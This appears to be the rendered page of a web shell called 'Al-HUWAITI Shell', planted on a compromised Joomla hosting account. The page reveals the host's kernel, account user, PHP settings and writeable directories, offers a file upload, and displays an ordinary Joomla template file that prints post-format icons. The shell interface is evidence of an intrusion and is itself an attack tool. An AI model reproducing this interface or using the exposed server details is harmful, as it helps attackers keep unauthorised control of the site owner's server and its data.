Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux webm012.cluster129.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : eventfrsgx ( 61451)
PHP Version : 7.3.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/eventfrsgx/www/templates/shaper_revibe/html/layouts/joomla/content/post_formats/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/eventfrsgx/www/templates/shaper_revibe/html/layouts/joomla/content/post_formats/icons.php
<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

$params 	= JFactory::getApplication()->getTemplate(true)->params;

$format = $displayData;

if($params->get('show_post_format')) {

	echo '<span class="post-format">';

	if (  $format == 'audio' ) {
		echo '<i class="fa fa-music"></i>';
	} else if (  $format == 'video' ) {
		echo '<i class="fa fa-video-camera"></i>';
	} else if (  $format == 'gallery' ) {
		echo '<i class="fa fa-picture-o"></i>';
	} else if (  $format == 'quote' ) {
		echo '<i class="fa fa-quote-left"></i>';
	} else if (  $format == 'link' ) {
		echo '<i class="fa fa-link"></i>';
	} else if (  $format == 'status' ) {
		echo '<i class="fa fa-comment-o"></i>';
	} else {
		echo '<i class="fa fa-thumb-tack"></i>';
	}

	echo '</span>';

}

Al-HUWAITI Shell